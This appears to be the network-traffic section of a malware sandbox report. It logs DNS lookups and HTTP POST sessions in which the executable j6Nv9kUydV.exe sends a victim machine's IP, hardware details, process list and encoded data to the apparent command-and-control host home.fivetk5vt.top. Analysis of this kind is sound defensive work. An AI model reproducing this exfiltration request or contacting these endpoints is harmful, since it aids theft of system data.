                                                      Dec 20, 2024 17:18:13.076026917 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076160908 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076188087 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076325893 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076440096 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076503038 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076507092 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076641083 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076726913 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076837063 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076841116 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076992035 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077066898 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077071905 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077099085 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077169895 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077178001 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077239037 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077297926 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077364922 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077447891 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077491999 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077500105 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077619076 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077800989 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077805996 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077863932 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077954054 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077961922 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.078003883 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.078042984 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.078227043 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.078236103 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.078330040 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079308033 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079399109 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079499960 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079591990 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079677105 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079680920 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079788923 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079793930 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079932928 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079967976 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080022097 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080132008 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080142975 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080224991 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080234051 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080238104 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080353975 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080358028 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080365896 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080370903 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080408096 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080450058 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080480099 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080559969 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080569029 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080573082 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080648899 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080652952 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080698013 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080766916 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080775976 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080864906 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080936909 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080940962 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080993891 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081078053 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081087112 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081090927 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081181049 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081341982 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081705093 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081832886 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081840992 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081845045 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081929922 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082005978 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082066059 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082170963 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082179070 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082185984 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082511902 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082596064 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082622051 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082712889 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082851887 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082856894 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082865953 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082917929 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083031893 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083199024 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083410978 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083441019 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083642006 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083692074 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083739042 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083821058 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083825111 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083833933 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084234953 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084289074 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084347963 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084491968 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084501028 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084566116 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084661961 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084666014 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084675074 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084695101 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084703922 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084754944 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084800959 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084858894 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084949017 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084953070 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.084996939 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.122721910 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.122857094 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.349006891 CET4972980192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:13.468550920 CET8049729185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.468636990 CET4972980192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:13.468884945 CET4972980192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:13.588310003 CET8049729185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:14.742285013 CET8049729185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:14.742432117 CET8049729185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:14.742485046 CET4972980192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:14.742743015 CET4972980192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:14.863173008 CET8049729185.121.15.192192.168.2.10

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 20, 2024 17:18:03.727962017 CET6043453192.168.2.101.1.1.1
                                                      Dec 20, 2024 17:18:03.728292942 CET6043453192.168.2.101.1.1.1
                                                      Dec 20, 2024 17:18:03.867022038 CET53604341.1.1.1192.168.2.10
                                                      Dec 20, 2024 17:18:03.867054939 CET53604341.1.1.1192.168.2.10
                                                      Dec 20, 2024 17:18:07.673774958 CET6043753192.168.2.101.1.1.1
                                                      Dec 20, 2024 17:18:07.673845053 CET6043753192.168.2.101.1.1.1
                                                      Dec 20, 2024 17:18:07.811785936 CET53604371.1.1.1192.168.2.10
                                                      Dec 20, 2024 17:18:07.812107086 CET53604371.1.1.1192.168.2.10
                                                      Dec 20, 2024 17:18:09.700790882 CET6043953192.168.2.101.1.1.1
                                                      Dec 20, 2024 17:18:09.700854063 CET6043953192.168.2.101.1.1.1
                                                      Dec 20, 2024 17:18:09.840060949 CET53604391.1.1.1192.168.2.10
                                                      Dec 20, 2024 17:18:09.840171099 CET53604391.1.1.1192.168.2.10
                                                      Dec 20, 2024 17:18:11.471820116 CET6044153192.168.2.101.1.1.1
                                                      Dec 20, 2024 17:18:11.472037077 CET6044153192.168.2.101.1.1.1
                                                      Dec 20, 2024 17:18:11.610188007 CET53604411.1.1.1192.168.2.10
                                                      Dec 20, 2024 17:18:11.610275984 CET53604411.1.1.1192.168.2.10
                                                      Dec 20, 2024 17:18:13.207850933 CET6044353192.168.2.101.1.1.1
                                                      Dec 20, 2024 17:18:13.207914114 CET6044353192.168.2.101.1.1.1
                                                      Dec 20, 2024 17:18:13.345464945 CET53604431.1.1.1192.168.2.10
                                                      Dec 20, 2024 17:18:13.348404884 CET53604431.1.1.1192.168.2.10

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Dec 20, 2024 17:18:03.727962017 CET192.168.2.101.1.1.10x8d9bStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:18:03.728292942 CET192.168.2.101.1.1.10xba1aStandard query (0)httpbin.org28IN (0x0001)false
                                                      Dec 20, 2024 17:18:07.673774958 CET192.168.2.101.1.1.10x3147Standard query (0)home.fivetk5vt.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:18:07.673845053 CET192.168.2.101.1.1.10x3340Standard query (0)home.fivetk5vt.top28IN (0x0001)false
                                                      Dec 20, 2024 17:18:09.700790882 CET192.168.2.101.1.1.10x7c23Standard query (0)home.fivetk5vt.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:18:09.700854063 CET192.168.2.101.1.1.10x2e79Standard query (0)home.fivetk5vt.top28IN (0x0001)false
                                                      Dec 20, 2024 17:18:11.471820116 CET192.168.2.101.1.1.10x84bfStandard query (0)home.fivetk5vt.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:18:11.472037077 CET192.168.2.101.1.1.10xdc52Standard query (0)home.fivetk5vt.top28IN (0x0001)false
                                                      Dec 20, 2024 17:18:13.207850933 CET192.168.2.101.1.1.10x82f9Standard query (0)home.fivetk5vt.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:18:13.207914114 CET192.168.2.101.1.1.10xf07cStandard query (0)home.fivetk5vt.top28IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Dec 20, 2024 17:18:03.867022038 CET1.1.1.1192.168.2.100x8d9bNo error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:18:03.867022038 CET1.1.1.1192.168.2.100x8d9bNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:18:07.811785936 CET1.1.1.1192.168.2.100x3147No error (0)home.fivetk5vt.top185.121.15.192A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:18:09.840171099 CET1.1.1.1192.168.2.100x7c23No error (0)home.fivetk5vt.top185.121.15.192A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:18:11.610188007 CET1.1.1.1192.168.2.100x84bfNo error (0)home.fivetk5vt.top185.121.15.192A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:18:13.345464945 CET1.1.1.1192.168.2.100x82f9No error (0)home.fivetk5vt.top185.121.15.192A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • httpbin.org
                                                      • home.fivetk5vt.top

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.1049716185.121.15.192808120C:\Users\user\Desktop\j6Nv9kUydV.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 20, 2024 17:18:07.935301065 CET12360OUTPOST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                      Host: home.fivetk5vt.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 442929
                                                      Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 31 34 38 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "1734711485", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                      Dec 20, 2024 17:18:08.055612087 CET3708OUTData Raw: 35 56 78 45 58 56 6b 4c 61 73 6e 5c 2f 42 4a 50 34 67 32 75 44 71 48 78 45 62 54 31 49 7a 76 75 66 68 7a 72 4d 63 57 42 31 4b 79 76 72 69 78 74 74 42 42 62 44 66 4b 43 4d 34 79 75 66 34 35 78 48 30 5c 2f 66 6f 6d 59 58 36 77 36 5c 2f 69 6c 69 6f
                                                      Data Ascii: 5VxEXVkLasn\/BJP4g2uDqHxEbT1IzvufhzrMcWB1KyvrixttBBbDfKCM4yuf45xH0\/fomYX6w6\/ilio08LiK+Er4iPhz4q1cLDEYabp1qaxdLgeeFnyTVnKnVlBpqUZOMk3\/XdD6B\/0rsTToVaPhVKcMTQpYminxt4cwqTo14RnSn7GfF8a0eeMk+WcIyV7Simmj8hKK\/X63\/4JOeILgkf8Ls0VCDgg+CL4kMP4T\/xU
                                                      Dec 20, 2024 17:18:08.055641890 CET3708OUTData Raw: 36 5a 65 66 7a 65 63 6a 5c 2f 50 34 30 2b 54 66 77 37 2b 59 6e 6c 78 66 36 75 4f 58 5c 2f 41 46 50 2b 66 38 35 6f 41 59 79 5c 2f 75 33 38 74 5c 2f 77 44 56 78 47 58 79 5c 2f 77 44 6e 74 5c 2f 69 50 5c 2f 77 42 56 4d 6b 6b 2b 5a 45 66 79 30 5c 2f
                                                      Data Ascii: 6Zefzecj\/P40+Tfw7+Ynlxf6uOX\/AFP+f85oAYy\/u38t\/wDVxGXy\/wDnt\/iP\/wBVMkk+ZEfy0\/8AI\/k\/Tj1NTM3mfOmU6f6zP+en4UB\/LWLZ5n7uLHmf9MPtX+f5+poOgrfxJvT5P+WqSfv4Prdfl+H6UN\/rIX\/1x\/5ayduP8\/rT4wkbb9kiJcfvSP8AUf8Abr7\/AM\/ftTJM\/cHyfvfK\/wBI6\/5z\/k
                                                      Dec 20, 2024 17:18:08.055685043 CET12360OUTData Raw: 45 4c 51 4e 4c 76 62 33 57 4e 4f 6e 6e 31 69 78 38 50 78 32 73 79 35 73 51 4c 58 2b 62 76 70 42 34 6a 67 7a 46 5a 66 6c 57 53 65 49 48 44 2b 4a 34 67 79 47 64 54 4f 4d 38 77 47 48 77 2b 50 78 6d 58 4f 4f 66 38 4f 38 4e 35 72 6a 38 4c 68 49 31 63
                                                      Data Ascii: ELQNLvb3WNOnn1ix8Px2sy5sQLX+bvpB4jgzFZflWSeIHD+J4gyGdTOM8wGHw+PxmXOOf8O8N5rj8LhI1cuxWCxVbFZnl082w2DoyxEsO60b1KMpqlOn\/o\/9DLhzG4XKcdxtwljKOUcW15\/6tZhmNWn9dU+Hc14gyijVvg8YsTl1Ghgsww2V4nE4mGEji+ROMcQqUqtOcf8AxEw\/9WU\/+bH\/AP4hq\/az\/gnZ+3Fa\/t
                                                      Dec 20, 2024 17:18:08.055789948 CET4944OUTData Raw: 48 53 48 41 5c 2f 77 42 56 4c 35 6e 2b 66 79 72 54 32 6e 6c 2b 50 5c 2f 41 41 68 6a 5c 2f 65 53 65 58 73 6a 6d 53 50 37 52 4c 35 70 5c 2f 63 65 64 33 5c 2f 78 7a 54 35 4d 5c 2f 75 39 5c 2f 33 50 38 41 50 2b 69 33 64 53 37 6b 2b 35 73 47 50 4e 5c
                                                      Data Ascii: HSHA\/wBVL5n+fyrT2nl+P\/AAhj\/eSeXsjmSP7RL5p\/ced3\/xzT5M\/u9\/3P8AP+i3dS7k+5sGPN\/5d4vI\/wA5qGOR8f3Ej\/1X766\/8Bf1yaPj8rfPf7uxpT6\/L9Qk\/ebN77PMit\/N\/c\/p\/j34\/GhpHTCfx\/6oSeb5\/wDnp+FPk\/1ieT\/zyt5ftHm4\/X\/69QybPmd08n975X7z\/Pf654rM0GbvL3
                                                      Dec 20, 2024 17:18:08.175462961 CET4944OUTData Raw: 50 38 41 68 2b 75 66 2b 6a 57 52 5c 2f 77 43 48 77 5c 2f 38 41 78 51 56 5c 2f 50 68 34 79 31 48 77 31 34 56 64 64 45 30 33 34 6d 66 43 50 34 6a 5c 2f 45 75 48 78 58 70 48 67 62 57 66 67 31 38 4c 66 45 66 6a 62 78 64 38 51 74 47 38 58 36 76 71 45
                                                      Data Ascii: P8Ah+uf+jWR\/wCHw\/8AxQV\/Ph4y1Hw14VddE034mfCP4j\/EuHxXpHgbWfg18LfEfjbxd8QtG8X6vqEGiR+HbTVR8NbD4P8AxB1ey8R3dn4ev7H4P\/Ff4kXI1K5MtlHfaZYavqGnQ+OdY8HeBbTUo5fi\/wDBLxZ4u8Naomj+Ofhv4F8X+L9e8V+CdQRxbarb3niW5+HOlfBXxnL4e1N4tJ1xPhP8XfiI1tdSSXNsLzSdO1
                                                      Dec 20, 2024 17:18:08.175504923 CET4944OUTData Raw: 67 31 5c 2f 77 55 73 2b 48 6e 37 52 66 67 72 77 5c 2f 77 44 44 58 34 46 4a 34 44 67 5c 2f 62 63 5c 2f 5a 74 31 62 78 48 62 61 42 34 77 30 4c 34 79 65 44 66 44 48 67 62 77 50 6f 33 78 41 2b 4e 6e 77 64 38 50 36 66 66 65 4a 76 68 72 34 35 5c 2f 61
                                                      Data Ascii: g1\/wUs+Hn7Rfgrw\/wDDX4FJ4Dg\/bc\/Zt1bxHbaB4w0L4yeDfDHgbwPo3xA+Nnwd8P6ffeJvhr45\/aPtrfxJ4r8G\/EL4v+AfE3xAjvNT0DTdT+nZI0lRo5USSNxh0kUOjD0ZWBVh7EEVmPoOhyRCCTRdJkhByIX06zaIHJORG0JTOSTnGcknvX8+eMPgLl3i5nnC2fYzPcdlOL4SwuMo5bTw1OnUoTr4rOMgzn6zXUrVVO
                                                      Dec 20, 2024 17:18:08.175668955 CET4944OUTData Raw: 4f 44 6a 57 72 55 31 4b 36 57 46 6a 51 6a 4f 58 4e 47 68 79 4a 51 50 35 53 38 4e 5c 2f 46 68 2b 48 48 69 72 6c 6e 69 66 6b 4f 55 59 56 56 73 6d 7a 71 74 6e 4f 57 35 4e 55 78 47 4d 2b 71 34 65 71 36 6a 72 34 66 44 75 74 55 78 4d 38 66 4f 68 51 71
                                                      Data Ascii: ODjWrU1K6WFjQjOXNGhyJQP5S8N\/Fh+HHirlnifkOUYVVsmzqtnOW5NUxGM+q4eq6jr4fDutUxM8fOhQqyhFOWMlipUoWeK9s\/any58MvEMXgL4o\/FP40\/tONYaJpXiz4c\/Af4j\/AAW+HXwz8H+JL34d\/D744fsPXnh\/VP2PPg14W8O6Jqepa54f+Gtt4YsNY+DUWp694j1NrLS\/EZ8TeP8AXde1T+0vEL+eeGPjDq
                                                      Dec 20, 2024 17:18:08.221050978 CET27192OUTData Raw: 73 7a 51 72 66 36 33 65 2b 5c 2f 5c 2f 41 46 6e 5c 2f 41 44 7a 36 65 33 35 2b 6f 35 77 4b 6d 6a 33 5c 2f 41 44 37 48 6b 5c 2f 65 52 65 62 7a 2b 5c 2f 77 44 30 5c 2f 77 44 31 2b 6e 53 68 5c 2f 4f 50 33 45 5c 2f 35 5a 65 62 6a 5c 2f 41 46 50 2b 63
                                                      Data Ascii: szQrf63e+\/\/AFn\/ADz6e35+o5wKmj3\/AD7Hk\/eRebz+\/wD0\/wD1+nSh\/OP3E\/5Zebj\/AFP+c9P50eY+19ieS\/8A0zl6f4fXv9a29\/8Au\/iaU+vyK0e\/c\/yZTzfKEnm\/v89u3pjPeiP+LLyb\/wDWmP8AL\/HA4HpT\/k\/12yN080y+Z\/ywm\/yc\/wAuc0x9+596Rv5f7qWSP\/P+HbNUaA3y\/vkSSZP
                                                      Dec 20, 2024 17:18:08.337076902 CET7416OUTData Raw: 5a 72 53 6e 34 4c 2b 45 4d 4b 6d 57 78 6a 57 70 34 65 55 73 77 68 4c 77 35 55 73 46 46 56 36 6b 4b 44 65 49 56 4e 4b 74 56 68 53 2b 4f 55 59 76 38 73 64 4e 5c 2f 59 5c 2f 38 62 54 58 63 4b 58 31 30 73 64 73 58 58 7a 57 53 42 59 32 32 5a 47 63 4f
                                                      Data Ascii: ZrSn4L+EMKmWxjWp4eUswhLw5UsFFV6kKDeIVNKtVhS+OUYv8sdN\/Y\/8bTXcKX10sdsXXzWSBY22ZGcO08wU44\/1bf0P6FfDD4ead8OPDltotiihkQec6\/xOTuYk8liXLMzEksxZmJJJr0zy\/f8AT\/69Hl+\/6f8A16\/dfB\/6Mvg14F4vMcw8OOEqOT5lmlGOGxeY4jHZlm+YSwsZRqPC0sbnGMx+LoYaVSEKk8NRrU
                                                      Dec 20, 2024 17:18:08.501142979 CET1236OUTData Raw: 65 5c 2f 38 41 2b 71 67 30 47 50 38 41 36 7a 37 6b 65 79 50 39 31 5c 2f 71 76 50 50 63 6a 67 2b 33 48 36 55 7a 35 39 33 6b 7a 50 48 73 5c 2f 31 55 74 75 66 33 48 36 66 5c 2f 71 71 62 7a 44 75 53 4f 48 35 33 4d 76 5c 2f 41 42 37 5c 2f 41 50 31 76
                                                      Data Ascii: e\/8A+qg0GP8A6z7keyP91\/qvPPcjg+3H6Uz593kzPHs\/1Utuf3H6f\/qqbzDuSOH53Mv\/AB7\/AP1v8\/jULf39kjw\/6rzLiXP+fwP51n7Pz\/D\/AIIDA3lh0Q\/P\/wAtZI\/3\/wDnmiNvJZHSbY\/MsUfm\/h65\/Pp7Yqby0ky++TZ\/rf3kv+j9f5D8ufwqHy\/+AD\/rr0uD\/wAuuP8AP1o9n5\/h\/wAE09p5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.1049717185.121.15.192808120C:\Users\user\Desktop\j6Nv9kUydV.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 20, 2024 17:18:09.960705996 CET12360OUTPOST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                      Host: home.fivetk5vt.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 442929
